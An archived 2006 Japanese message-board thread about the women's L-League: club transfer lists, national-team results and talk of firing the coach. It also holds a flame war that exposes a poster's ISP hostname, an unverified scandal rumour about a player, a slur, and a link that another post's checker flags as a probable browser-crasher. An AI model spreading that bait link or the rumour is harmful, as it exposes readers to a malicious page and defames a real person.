(入団)谷由美監督(伊賀FCフロイラインコーチ)、坂田恵GKコーチ(日本体育大GKコーチ)、
 DF小林恵(旧宝塚)、庄子菜摘(大原学園)、伊久間鮎子(神奈川大)、MF清原祐子
 (旧宝塚)、鈴木麻友(神奈川大)、四宮由美子(東京女子体育大)、立岡幸子(神奈川大)
(退団)江川重光監督(未定)、DF宮崎有香(東京電力)、藤村智美(INAC)、MF原歩(INAC)

138 :U-名無しさん:2006/05/08(月) 00:00:06 ID:mpnKwGIr0
【高槻】
(入団)中野あずさコーチ(履正社FCコーチ)、MF伊丹絵美(旧宝塚)
(退団)MF鳥越恵(現役引退)、FW小中山咲子(現役引退)

【TASAKI】
(入団)GK佐々木香織(神村学園高)、DF清原万里江(旧宝塚)、河上恵実子(FC VITORIA)、
 MF阪口夢穂(FC VITORIA)、FW田頭陽子(鳳凰高)
(退団)GK鈴木理紗(大原学園)、DF岩田久美(未定)、MF柳田美幸(浦和)、
 土橋優貴(大原学園)、FW薬師寺良子(京都)


【INAC】
(入団)DF李珍和(韓国・栄進専門大)、藤村智美(伊賀)、MF原歩(伊賀)、角田英子
 (日本体育大)、福田沙矢香(神奈川大)、FW園村奈菜(神村学園高)
(退団)DF井本幸乃、柳井里奈、梅林早知、田中博美、MF石野由果、高木未来
 (以上INACアマチュア)、下村亜沙実(京都)

【岡山湯郷】
(入団)三輪和幸コーチ(前JFL・FCホリコシ監督?)、GK鎌倉公子(東京女子体大)、
 DF小森有華(北海道文教明清高)、杉山紫乃(藤枝順心高)、 MF神成美紀(北海道
 文教明清高)、 
(退団)清水健太GKコーチ(JFL三菱自動車水島にて選手に専念)、DF田中ちづる
 (現役引退?)、三宅由真(武庫川女大)、FW江口なおみ(学業専念)

139 :U-名無しさん:2006/05/08(月) 00:00:32 ID:JqVI3mbu0
L2
【狭山】
(入団)GK大谷明香(常盤木学園高)、
(退団)GK早田志麻(現役引退)、MF山田薫(現役引退、指導者へ)

【市原・千葉】
(入団)GK伊藤美華(旧宝塚)、DF黒濱佳奈子、MF石田美穂子(武蔵丘短大)、
 井上由惟子(柏ラッセルFC)
(退団)MF熊谷真理子、斉藤玲香、常見友里恵、根岸奈緒子、野田直美、花桐なおみ
 (以上未定)、 FW青井通江、三枝優,、末木小枝、土屋いづみ、吉橋美保(未定)
 ※サテライトチーム(U-18)移籍またはメンバー表非登録の可能性あり

【大原学園】
(入団)GK鈴木理紗(TASAKI)、DF住江真祐子(神奈川大)、高橋奈々(常盤木学園高)、
 三枝麻紀(本庄第一高)、MF高木奈央(桐陽高)、土橋優貴(TASAKI)、森田保々美
 (しゅうSC)、多々良真希(吉田高)、FW佐藤麻依子(石巻女子商高)、中川千尋
 (常盤木学園高)、黒瀧歩(千葉学園高)
(退団)DF庄子菜摘(卒業→伊賀)、堤晴菜(卒業→福岡)、MF栗原美怜
 (卒業→メルサ熊本)

【新潟】
(入団・就任)鳴尾直軌監督(育成部コーチ)、DF深田未央(日本体育大)、井上光保
 (東京女子体育大)、FW上尾野辺めぐみ(武蔵丘短大)、中村公美(東京女子体育大)
(退団・退任)牛浜真監督(京都監督就任)、村岡誠フィジカルコーチ(JFLロッソ熊本フィジコ就任)、
 DF岡林亜希代(現役引退)、屋富祖綾乃(未定)、FW渡辺樹里(京都)

140 :U-名無しさん:2006/05/08(月) 00:00:46 ID:JqVI3mbu0
【清水】
(入団)DF宇佐美洋子(立川FC)、MF濱中沙希(大阪体育大)、私市若菜(立川FC)、
 FW横山真実(立川FC)
(退団)DF渡部美也(未定)、FW山本輪(未定)

【京都(旧宝塚・旧FC SPIELEN)】
(入団)牛浜真監督(新潟監督)、GK栗田江梨(武蔵丘短大)、DF清水千浪(愛媛大)、
 鈴木舞子(武蔵丘短大)、MF渡辺樹里(新潟)、中田奈月(武庫川女大)、下村亜沙実
 (INAC)、藤本優希(武蔵丘短大)、竹下由起(豊津女子FC)、FW薬師寺良子(TASAKI)、
 永吉麗奈(ESPERIO KYOTO FC)、天馬舞(武蔵丘短大)
(退団)高藤順TA(兼任していた吉備国際大総監督に専念)、島田素英監督(福岡コーチ)、
 DF田中真由美(現役引退)、清原万里江(TASAKI)、小林恵(伊賀)、MF清原祐子
 (伊賀)、伊丹絵美(高槻)、深澤里沙(福岡)、重松真由美(現役引退)、FW柏原慶子、
 谷原ゆかり(福岡)

【福岡】
(入団)島田素英GKコーチ(旧宝塚監督)、DF堤晴菜(大原学園)、FW柏原慶子、
 谷原ゆかり、深澤里沙(以上旧宝塚)
(退団)DF石井佐代子(未定)

【熊本】
(入団)GK中村早希(FC三木ヴィクトリーズ)、DF嶋田美香(誠修高)、MF峯知美
 (熊本Utd.フローラ)、清水瀬菜(熊本フェニックス・二重登録)、FW竹内佐智佳(再入団)、
 築山和奈(熊本フェニックス・二重登録)、
(退団)GK野添愛未(現役引退、フェニックス監督就任)、FW田代弘美(現役引退、スタッフ
 就任)、寺澤希(早稲田大)

141 :U-名無しさん:2006/05/08(月) 00:05:22 ID:gPP0X6vc0
どうしてsoftbank220063052104.bbtec.netは自分が
http://ex12.2ch.net/test/read.cgi/soccer/1146753338/
でやった荒らしレスは削除依頼しないの?
自分は他スレ荒らしておいて、自分のスレが報復されたら削除依頼ですか?
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

213 名前:鳥[] 投稿日:06/05/07(日) 18:43 HOST:softbank220063052104.bbtec.net<8080><3128><8000><1080>
削除対象アドレス:
http://ex12.2ch.net/test/read.cgi/soccer/1146759948/109-114
http://ex12.2ch.net/test/read.cgi/soccer/1146759948/116-118
削除理由・詳細・その他:
連続投稿

214 名前:鳥[] 投稿日:2006/05/07(日) 18:46:34 HOST:softbank220063052104.bbtec.net
>>213に追加
http://ex12.2ch.net/test/read.cgi/soccer/1146759948/119-120

215 名前:鳥[] 投稿日:2006/05/07(日) 18:53:49 HOST:softbank220063052104.bbtec.net
>>213にさらに追加。(現在進行形…
http://ex12.2ch.net/test/read.cgi/soccer/1146759948/122

216 名前:鳥[] 投稿日:2006/05/07(日) 19:43:07 HOST:softbank220063052104.bbtec.net
>>213追加
http://ex12.2ch.net/test/read.cgi/soccer/1146759948/125-127


142 :U-名無しさん:2006/05/08(月) 00:46:11 ID:MgfVV4e5O
元新潟の岡林選手は地元(??)の愛知のクラブチームで続けてるよ!

143 :U-名無しさん:2006/05/08(月) 01:38:18 ID:yuO74P8h0
>>139
なでリーグ公式によると狭山の#11國井綾子がなぜか未登録のまま。
退団なら残念なんだが。

144 :124:2006/05/08(月) 06:03:26 ID:O6Cn/jC6O
おまいらみてーな厨房は開幕しても懲りずに続けてんだろーよ

145 :U-名無しさん:2006/05/08(月) 06:39:26 ID:tI8tpo2W0
>>124,144
ID:gPP0X6vc0の池沼はスルー汁、つ〜か(わざとだろうが)釣られてageるなよ……

146 :U-名無しさん:2006/05/08(月) 11:35:10 ID:yAxbPd6I0
文化放送「吉沢照美のやる気MANMAN」
午後2時の興味津々(午後2時20分から40分)
5月 8日(月) 女子サッカー GK小野寺志保選手
なでしこジャパンでも活躍。美人サッカー選手。天は二物を与えるんですね。5/21になでしこリーグが開幕するのに先立って小野寺選手に見所もきいちゃいます。
http://www.joqr.co.jp/yaruman/guest.html

147 :U-名無しさん:2006/05/08(月) 13:25:02 ID:iVCU6q3L0
情報乙。

Fマリノスに澤みたいなのいるね。
Jリーグタイムとスパサカでしか見てないけど。


148 :U-名無しさん:2006/05/08(月) 13:51:45 ID:EUIaYse10
>>147
それ髪型を変えた清水(FW)だと主w

すれ違いの話題にてこれまで。

149 :U-名無しさん:2006/05/08(月) 18:13:45 ID:XLzQ6WHM0
>>147-148

昨日のやべっちのキャプ画
ttp://dokuo-ha-hitori.dyndns.tv/~dokuo/cgi-bin/zuru/source/dokuo4331.jpg

たしかに澤に似てるw

150 :U-名無しさん:2006/05/08(月) 18:16:16 ID:ktrjgxql0
>>149
澤っていうよりインディアンだなw

151 :U-名無しさん:2006/05/08(月) 18:44:14 ID:PUJfmV6IO
澤はインディアン…w

152 :U-名無しさん:2006/05/08(月) 18:59:43 ID:8vLFnoo40
田口監督のブログよると昨日の代表の戦いぶりから見ると
学生選抜チームから代表に上がる選手が出そうだとのこと。

ttp://ninho.exblog.jp/

確かにいい選手はいたけど、2部降格候補の伊賀から1点も
取れないでフル代表候補と言われてもなあ。

153 :U-名無しさん:2006/05/08(月) 19:34:12 ID:PUJfmV6IO
>>152
代表の方には怪我で離脱した選手が何人かいるし、追加召集は有り得るだろう。
怪我した本人が復活できない場合の話だが。

154 :U-名無しさん:2006/05/08(月) 20:12:41 ID:GaNQ5BPD0
>>140
熊本追加
退団
倉本直子(引退、学業専念)、荒木真美(引退、フェニックスジュニアコーチ)

155 :U-名無しさん:2006/05/08(月) 20:33:03 ID:GaNQ5BPD0
もいっちょ追加情報。
リーグ公式には、21番GK河島佳奈の名前が抜けているが、
これは本人が、福岡大学に移籍するか、ルネサンスに残るかの決心をしたのが
3月末頃だったため、公式サイトへのデータ提出期限に間に合わなかったと思われ。

というわけで、選手は合計22人になるが、25人枠まであと3人の空きがあるので、
ここにフェニックスの中学生が入るかもしれん。
(最近の練習試合で、5人くらい使っているのだ。)

156 :U-名無しさん:2006/05/08(月) 23:43:51 ID:tZ8vGYuO0
>>91
見てきた訳じゃないが
浦和RJrYL−日体大 は 0−2 だそうだ

157 :U-名無しさん:2006/05/08(月) 23:46:38 ID:l/Zse8PCO
>>152
その伊賀が上位リーグ入りかもしれないよw
田口も今日、明日に、なでしこ入りするとは、書いてないから

158 :U-名無しさん:2006/05/09(火) 00:19:06 ID:4t3nXLKF0
田口さん、今回はいつもの田口節はあまりなかったようですね
参加した選手の気持ちをかなり掴んだようです
でも、なで1、2もレベルもっとあげないとね


159 :U-名無しさん:2006/05/09(火) 00:51:02 ID:oUktDkA0O
今季の福島の女子サッカー熱はどうよ?
今週末のマリーゼのプレシーズンマッチのTVCM、バンバンやってる?

160 :U-名無しさん:2006/05/09(火) 02:33:00 ID:2ufDCbOk0
>>152
田口さん、書いてることはまともなんだよな。
というか、激しく同意な部分が多いんだけどな。

161 :U-名無しさん:2006/05/09(火) 08:36:29 ID:cr0z/KXvO
>>158
決勝に限れば、田口節は数回あったよ
相変わらずだなとは思ったけど、明らかなミスジャッジだったから

162 :U-名無しさん:2006/05/09(火) 12:34:03 ID:czB1zLNS0
昨日発売の週刊ポストの巻頭カラーグラビアに
安藤と沢.柳田が有るよ。

163 :U-名無しさん:2006/05/09(火) 17:36:43 ID:6Qhq/AEOO
長居情報求む。

164 :U-名無しさん:2006/05/09(火) 17:47:01 ID:Km8k38gh0
       ☆ チン       
                  ____________
 ☆ チン  〃 ∧_∧   /
  ヽ ___\(\・∀・)< 大橋の更迭マダー??
      \_/⊂ ⊂_)_ \____________
    / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
   |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:|  |
   |            .|/

165 :U-名無しさん:2006/05/09(火) 17:50:32 ID:0ZKFMLjr0
BS実況板を見たら参加者が少なく情報を得られない。

166 :U-名無しさん:2006/05/09(火) 17:55:41 ID:4t3nXLKF0
後半アメリカゴールで0ー1で負け・・・

167 :U-名無しさん:2006/05/09(火) 18:25:34 ID:7Rs68s+i0
↓思いっきりベレーザのあの人のことじゃん

5月9日なでしこジャパンの人気選手に不倫騒動
http://www.geocities.com/keisatu_sousa_shinjitu/index.htm


168 :U-名無しさん:2006/05/09(火) 18:28:53 ID:3CkpR+z30
>>167
注意!ループタグを発見! (2)
危険!FDDアタックを発見!(1)
危険!無限ループを発見! (1)
危険!Telnetストームを発見! (2)
危険!ソースストームを発見! (1)

ブラクラチェックが終了しました。

[このアドレスの安全度 10%]

169 :U-名無しさん:2006/05/09(火) 18:46:57 ID:4XUOGGDY0
今のままでW杯、オリンピックのメダルを取れるのかいな

170 :U-名無しさん:2006/05/09(火) 19:05:38 ID:5v3xWOuy0


PCからの書き込みまだ?

お前が熊本のソフトバンクからの書き込みだってことはみんなわかってるけどwwww


74 名前:69[] 投稿日:2006/05/07(日) 01:38:09
>>71
伊賀の山奥の屋外でPCでモバイルと携帯か...何言っても無駄だなこりゃ
そこまで暇じゃないよw
だったら、最初から「出て来い」なんて書くなよw
歪んだとか煽りとか自分の事か?w
IP晒したり、削除依頼、根拠の無い因縁、先にやったのどっちだ?
俺は熊本じゃないけど旅行中なんで、家に帰ったら、ホントにPCから書き込みしてやるから、解析でも何でもやってみろよ



171 :U-名無しさん:2006/05/09(火) 19:08:44 ID:5v3xWOuy0

>ホントにPCから書き込みしてやるから、解析でも何でもやってみろよ

はやく書き込みしてみろよ口だけのハッタリ野郎さん( ´,_ゝ`) プッ


172 :U-名無しさん:2006/05/09(火) 19:20:15 ID:XqaDzMrsO
かりあげ君更迭で
イイヨ

後任は田口でイイヨ


173 :U-名無しさん:2006/05/09(火) 19:20:31 ID:2ufDCbOk0
J'sゴールの速報見ても、詳細は分からずじまい。
仕方ない、見に行ったヤツのレポートが出るまで待つか。

174 :U-名無しさん:2006/05/09(火) 19:24:59 ID:2ufDCbOk0
>>172
それは…












かなり有り得る…

175 :U-名無しさん:2006/05/09(火) 19:43:38 ID:OuhiP7lL0
最近の格上との試合イタリア、アメリカと全敗じゃ田口でも仕方ないか

176 :U-名無しさん:2006/05/09(火) 19:49:57 ID:TxMieYjR0
みんなで借り上げ更迭デモしようぜwwwww


177 :U-名無しさん:2006/05/09(火) 19:58:55 ID:6Qhq/AEOO
まぁいずれにせよ、アジアカップ次第だろな。それまではこのままだろな。

178 :U-名無しさん:2006/05/09(火) 20:12:22 ID:OuhiP7lL0
アジアカップ3位以下なら更迭かな

179 :U-名無しさん:2006/05/09(火) 22:23:59 ID:JFadkxKm0
なんで荒らしにくるんだ?
このスレは他スレを荒らすことを推奨してるのか?

135 名前:U-名無しさん[] 投稿日:2006/05/09(火) 22:22:23 ID:cr0z/KXvO
>>132
執念だねw
まだ大阪にいるんで無理だな
ちなみに、俺は関東のソフトバンクだから
戻ったら書いてやっても構わないが、どうせ難癖つけたいだけだろw



180 :U-名無しさん:2006/05/09(火) 22:25:14 ID:JFadkxKm0
荒らしはやめろ!

Lリーグ&女子サッカー part22
http://ex12.2ch.net/test/read.cgi/soccer/1146753338/135


181 :U-名無しさん:2006/05/09(火) 22:25:56 ID:JFadkxKm0
勝手に重複スレを立てておいて

今度は荒らし攻撃か?


182 :U-名無しさん:2006/05/09(火) 22:30:46 ID:JFadkxKm0
初めてこのスレに来た人はこれを読んでね。毎日あっちの本スレを荒らすバカがいるのが原因。

Lリーグ&女子サッカー part22
http://ex12.2ch.net/test/read.cgi/soccer/1146753338/102

> 102 名前: ◆5x7hg/izPs [] 投稿日:2006/05/07(日) 16:38:40 ID:INOhb0fd0

> このスレを見るであろう削除人さんへ

> >>23がテンプレが気に入らないという理由で重複スレを立ててからこのスレは連日の荒らしにあっています。
> (>>55-58 >>66-70 >>81-83 ID:rBoWLHKNO ID:JYACBTsHO)

> http://qb5.2ch.net/test/read.cgi/saku/1143121192/75
> での彼の発言を見ればわかるようにこの既存スレが荒らされれば削除されやすくなる
> と思っているようで重複スレの住人がここで連日荒らし行為を行っています。

> テンプレが気に入らないから重複スレを立てる → 既存スレッドを荒らして潰す
> という行為は非常に悪質です。そのあたりも考慮して正しい判断をお願いいたします。

> なおこのスレでは>>96のように重複スレッドへの荒らし行為を絶対にやらないように呼びかけています。
> ID:rBoWLHKNO ID:JYACBTsHO はあちらの重複スレでも同じIDで書き込んでいるのですが
> 彼がこのスレで行っている荒らし行為に対して注意する住人が重複スレには1人もいません。


> 荒らし行為をやっているのはあちらの重複スレの住人だけです。

183 :U-名無しさん:2006/05/09(火) 23:01:00 ID:WxUBhNQz0
>>167
「フリンゆうたら、アレですか、エェ風ふいたら♪チンチロリ〜ン」
「キミ、そらフウリンやがな」


184 :U-名無しさん:2006/05/09(火) 23:17:21 ID:oUktDkA0O
プロリーグが無くなってアメリカの選手は普段何して生活してるんだろう?

185 :U-名無しさん:2006/05/09(火) 23:57:36 ID:M5S6McdF0
世界の舞台ではパワー、高さで負けるのは仕方ないとして、スピード
で勝てないとせっかくの高いスキルも効果が半減する。
大学、高校チームも含めて、隠れた俊足FW or SBを知ってたら
教えてくれないかな。
特に隠れた存在ではないけど、大体大の中川は結構、速いと思うが
代表召集はまだ無理か?

186 :U-名無しさん:2006/05/10(水) 06:45:46 ID:Q8ssVnif0
>>185
まだまだそんなレベルじゃないでしょ。
代表監督が本田さんに万が一代わったら呼ぶ可能性はあるかもね。


でももしそうなったら中川のまえに角を試したいだろうな

187 :U-名無しさん:2006/05/10(水) 09:13:06 ID:uYebC9DY0
>>185
>>186

誰が俊足かってのは難しいな
相手のDFが遅けりゃ相対的に早く見えるし
中川は微妙、カドはまずU-XX召集でしょ

>>175

荒らしはそちらだろ
マルチポストしてるんだから、どちらに書き込んでも構わないだろ
そもそも、マルチポストが荒らしなんだが

> ったら書いてやっても構わないが、どうせ難癖つけたいだけだろw

これが、難癖って訳かw

188 :U-名無しさん:2006/05/10(水) 10:34:37 ID:u+d8+L8+O
>>186-187
角ってだれじゃー!
と思ったら、加戸のことか。

189 :U-名無しさん:2006/05/10(水) 10:43:37 ID:YQbuML0O0
>>187
http://jbbs.livedoor.jp/bbs/read.cgi/sports/5908/1044856943/l50

重複スレ問題はこちらでどうぞ。

190 :U-名無しさん:2006/05/10(水) 17:31:45 ID:dRQuPD1UO
日曜日は阪口ちゃんはスタメンかいな?

191 :175:2006/05/10(水) 17:40:55 ID:U4x29eNk0
>>187
何じゃあ━━━━━━━━ッ!!
大橋(゚听)イラネって言うと荒らしなのかよ


192 :U-名無しさん:2006/05/10(水) 18:01:21 ID:mY2hDObv0
>>191
>>187のアンカー違いだろ

193 :U-名無しさん:2006/05/10(水) 19:57:22 ID:OdwGfg2L0
>>190
実力的には、スタメン張れるだけのものは持っているだろう。
チームに入って1ヶ月そこそこで、どれだけチームに溶け込んでいるかが、
注目点ではあるな。

194 :U-名無しさん:2006/05/10(水) 20:12:33 ID:dRQuPD1UO
ということは
今年のTASAKIは柳田のところに阪口が入って、あとは大体同じかな?
偉い人、TASAKIとベレーザのスタメン予想してくれない?

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)